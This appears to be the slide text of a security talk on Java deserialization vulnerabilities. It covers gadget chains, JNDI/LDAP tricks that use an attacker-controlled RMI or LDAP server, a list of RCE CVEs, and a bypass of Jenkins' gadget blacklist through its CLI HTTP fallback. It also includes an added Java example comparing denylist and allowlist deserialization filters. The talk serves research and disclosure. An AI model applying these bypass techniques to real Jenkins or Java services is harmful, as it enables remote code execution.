    [Diagram: a call to toString() on a Proxy implementing Interface is dispatched to InvocationHandler.invoke(target, toString, args) // do smth]
  • 25. What to look for?
    [Screenshot: InvocationHandler that prints out the method being called]
  • 26. What to look for?
    What if InvocationHandler.invoke() does "insecure stuff" using values from the serialized object input stream?
    [Diagram: Proxy]
  • 27. Making gadget search easier
    - Chris Frohoff released a tool for finding gadgets using a graph database
    - Uses object graph queries for gadget search
  • 28. Exploitation tricks
    - Adam Gowdiak’s TemplatesImpl
      - com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl is serializable
      - Allows defining new classes from your byte[][]
      - Calling TemplatesImpl.newTransformer() on the deserialized object → code execution
  • 29. Exploitation tricks
    - InitialContext.lookup()
      - @benmmurphy used it for a sandbox escape (CVE-2013-5830)
      - @zerothoughts published a gadget in Spring’s JtaTransactionManager recently
        - Triggers InitialContext.lookup(jndiName)
        - Uses "rmi://yourFakeRmiServer/Object" as jndiName
        - Loads classes from your fake RMI server
      - Calling JdbcRowSetImpl.execute() on a deserialized object will do the same :)
  • 30. Payload generation
    - Chris Frohoff released the great tool "ysoserial"
    - Makes creation of payloads easy
    - Includes gadgets for
      - Commons Collections 3 & 4
      - Spring
      - Groovy
      - JRE7 (<= jre7u21)
      - Commons BeanUtils
      - and even more!
  • 31. Custom payloads
    - I wouldn’t go for Runtime.getRuntime().exec(cmd) for several reasons
    - Most of the gadgets don’t touch the disk :)
    - With scripting languages your life gets even easier
    - Use what’s in the classpath
      - JavaScript (Rhino, Nashorn)
      - Groovy
      - BeanShell
      - etc.
  • 32. Code White’s Bug Parade #1
    - CVE-2015-6554 - Symantec Endpoint Protection Manager RCE
    - CVE-2015-6576 - Atlassian Bamboo RCE
    - CVE-2015-7253 - Commvault Edge Server RCE
    - CVE-2015-7253 - Apache ActiveMQ RCE
    - CVE-2015-4582 - Oracle WebLogic RCE
    - CVE-2016-1998 - HP Service Manager RCE
    - CVE-2016-2173 - Spring AMQP RCE
    - CVE-2016-3493 - Oracle Hyperion RCE
    - CVE-2016-3551 - Oracle WebLogic RCE
    - CVE-2016-3551 - Oracle WebLogic RCE
  • 33. Code White’s Bug Parade #2
    - NOT-FIXED - IBM WebSphere MQ JMS client RCE
    - NOT-FIXED - IBM WebSphere JMS client RCE
    - NOT-FIXED - Pivotal RabbitMQ JMS client RCE
    - NOT-FIXED - Oracle OpenMQ JMS client RCE
    - CVE-2016-4978 - Apache ActiveMQ Artemis JMS client RCE
    - CVE-2016-4974 - Apache Qpid client/JMS client RCE
    - CVE-2016-0638 - Oracle WebLogic JMS client RCE
    - FIXED-NO-CVE - IIT Software SwiftMQ JMS client RCE
    - MAYBE-FIX - Amazon SQS Java Messaging RCE
    - WONT-FIX - JBoss HornetQ JMS client RCE
  • 37. Jenkins
    - Open Source Automation Server / Continuous Integration Server / "Build" Server
    - Created by Kohsuke Kawaguchi (ex-Oracle, now CTO of CloudBees)
    - Fork of Oracle’s Hudson CI server
    - Supports Subversion, Git, Mercurial, etc.
    - Runs Maven, Ant, etc.
    - More than 1200 plugins! (see https://updates.jenkins-ci.org/download/plugins/)
  • 38. Jenkins
    - Nice target because Jenkins
      - has access to source code repositories
      - creates deployment artefacts (Jar, War, Ear, etc.)
      - can deploy artefacts on target servers
      - stores credentials (user/password, SSH keys)
  • 39. Jenkins Internals
    - Jenkins uses an extra port for the Command Line Interface (CLI)
    - Can be configured to a fixed or random port
  • 40. Jenkins Internals
    - Jenkins uses its own RMI protocol for its Command Line Interface (CLI)
    - Base64-encoded serialized objects (rO0 → 0xac,0xed)
  • 41. Jenkins under Attack
    - The Jenkins CLI endpoint suffered from several vulnerabilities
    - CVE-2015-8103 of Steven Breen using the Commons Collections gadget
    - Jenkins introduced a blacklist to filter gadget classes
    - CVE-2016-0788 of Moritz Bechler bypassing the blacklist (see ERNW blog post https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/)
    - As we all know, blacklisting is hard because you never know …
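The blacklisting problem of slide 41 in code, as an added example (this is not Jenkins' filter and not code from the talk): since Java 9 (and as sun.misc.ObjectInputFilter in 8u121+) ObjectInputStream accepts a JEP 290 deserialization filter, and the two filter patterns below contrast a denylist that names known-bad classes with an allowlist that names only the expected ones. The JDK class names are real; the filter patterns, the sample objects and the FilterDemo class are constructed for this example.

```java
import java.io.*;
import java.util.*;

// Added example (not from the talk): denylist vs. allowlist deserialization
// filters using java.io.ObjectInputFilter (JEP 290, Java 9+).
public class FilterDemo {

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns the class name of the deserialized object, or a REJECTED/MISSING
    // marker when the filter or class loading stops the read.
    static String readWithFilter(byte[] bytes, ObjectInputFilter filter) throws IOException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(filter);
            return ois.readObject().getClass().getName();
        } catch (InvalidClassException e) {
            // ObjectInputStream raises InvalidClassException("filter status: REJECTED")
            return "REJECTED (" + e.getMessage() + ")";
        } catch (ClassNotFoundException e) {
            return "MISSING (" + e.getMessage() + ")";
        }
    }

    public static void main(String[] args) throws Exception {
        // Denylist in the style of a gadget-class blacklist: reject one named class;
        // every class the filter has no opinion about is UNDECIDED, which the
        // stream treats as "accept".
        ObjectInputFilter denylist = ObjectInputFilter.Config.createFilter("!java.util.HashMap");

        // Allowlist: name exactly the classes the endpoint expects, then "!*" rejects
        // the rest. java.lang.Object is needed because ArrayList.readObject() asks the
        // filter to vet an Object[] of the declared size (arrays are checked by
        // component type). maxdepth/maxrefs bound nested object graphs.
        ObjectInputFilter allowlist = ObjectInputFilter.Config.createFilter(
                "maxdepth=8;maxrefs=1000;java.util.ArrayList;java.lang.String;java.lang.Object;!*");

        byte[] list = serialize(new ArrayList<>(Arrays.asList("a", "b")));
        byte[] hashMap = serialize(new HashMap<String, String>());
        // A functionally similar class the denylist author did not think of.
        byte[] treeMap = serialize(new TreeMap<String, String>());

        System.out.println("denylist  / ArrayList: " + readWithFilter(list, denylist));
        System.out.println("denylist  / HashMap:   " + readWithFilter(hashMap, denylist));
        System.out.println("denylist  / TreeMap:   " + readWithFilter(treeMap, denylist));

        System.out.println("allowlist / ArrayList: " + readWithFilter(list, allowlist));
        System.out.println("allowlist / HashMap:   " + readWithFilter(hashMap, allowlist));
        System.out.println("allowlist / TreeMap:   " + readWithFilter(treeMap, allowlist));
    }
}
```

The denylist stops HashMap but lets TreeMap through because it has no rule for it, which is exactly the "you never know" problem; the allowlist rejects both because anything it does not name falls to "!*". Two details matter when writing such patterns: the filter is consulted for every class descriptor in the stream, including serializable superclasses (so "!java.util.HashMap" also rejects a LinkedHashMap, whose descriptor chain contains HashMap), and collections that allocate arrays in readObject() trigger a check on the array's component type. On Java 8u121 the same filter is installed with sun.misc.ObjectInputFilter.Config.setObjectInputFilter(ois, filter) instead of the instance method.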
  • 43. Finding a blacklist filter bypass
    - How to bypass a gadget blacklist filter?
      a) Find a new gadget
      b) Find a bypass gadget (see Alvaro’s and Christian’s research)
      c) Look for a partially fixed gadget
    - After looking at all gadgets of ysoserial and matching them with Jenkins’ third-party libs and the blacklist, I found one interesting gadget discovered by Moritz Bechler:
  • 44. The JSON1 gadget
    - "Code execution step"
      - filtered by blacklist :(
    - "Trigger step"
      - invokes all "getter" methods on a serialized object
      - not filtered by blacklist :)
    - "Init step"
  • 45. Finding a blacklist filter bypass #1
    - Initial idea was to use the JdbcRowSetImpl trick as code execution step
    - "Getter" methods trigger the JNDI call:
    - But net.sf.json.JSONObject.containsValue(JdbcRowSetImpl instance) fails because several "getter" methods trigger exceptions :(
  • 46. Finding a blacklist filter bypass #2
    - Next idea was to look for other serializable classes with "getter" methods leading to code execution
    - Recent research FTW:
  • 47. Finding a blacklist filter bypass #2
    - JNDI lookups can lead to RCE (see JdbcRowSetImpl)
      - Exploitation using RMI, LDAP and CORBA
    - LDAP queries can lead to RCE
      - LDAP server needs to be under your control
      - data from the LDAP response is deserialized using ObjectInputStream
      - data (URLs) from the LDAP response is used to load classes using URLClassLoader → RCE
    - I found some nice classes in package "com.sun.jndi.ldap"
    - One of them is the serializable class "com.sun.jndi.ldap.LdapAttribute"
  • 49. Putting it all together for the new JSON2 gadget
    - With LdapAttribute.getAttributeDefinition() we get code execution using a custom LDAP server
    - The "Init step" shown before doesn’t work, so we need something else :(
    - By using Eclipse an alternative code path can be easily found :)
  • 50. Some "updates" with regards to exploitation …
    - Previous research only mentioned the CLI port!
    - If you have Jenkins running on the internet behind a firewall / reverse proxy, you can’t connect
    - But the Jenkins Wiki has some hidden gems for us:
    Connection mechanism
    1. Jenkins CLI clients and Jenkins server establish the communication in the following fashion. Jenkins listens on a TCP/IP port configured under "TCP port for JNLP agents" in the system configuration page. This single port is used for both agents and CLI.
    …
    5. If that fails (for example, if there's a reverse proxy and Jenkins runs on a different host, or if a firewall blocks access to this TCP/IP port), or if the header is not found, it will fall back to the communication mechanism that uses two simultaneous HTTP connections.
  • 51. Jenkins CLI HTTP "fallback"
    - HTTP Connection #1
      - Server → Client channel
      - Client reads from InputStream
      - UUID as identifier
      - Blocks until #2 connects
    - HTTP Connection #2
      - Client → Server channel
      - Client writes to OutputStream
      - UUID as identifier
  • 52. Jenkins - 2.19.2 LTS DEMO
  • 53. Jenkins - 2.19.2 LTS
  • 54. Jenkins - 2.19.2 LTS
  • 55. Conclusion
    - Java Deserialization is no rocket science
    - Finding bugs is trivial, exploitation takes more
    - So many products are affected by it
    - Research has started, again …
    - This will never end!
  • 57. Java Deserialization Vulnerabilities – The forgotten bug class
    Matthias Kaiser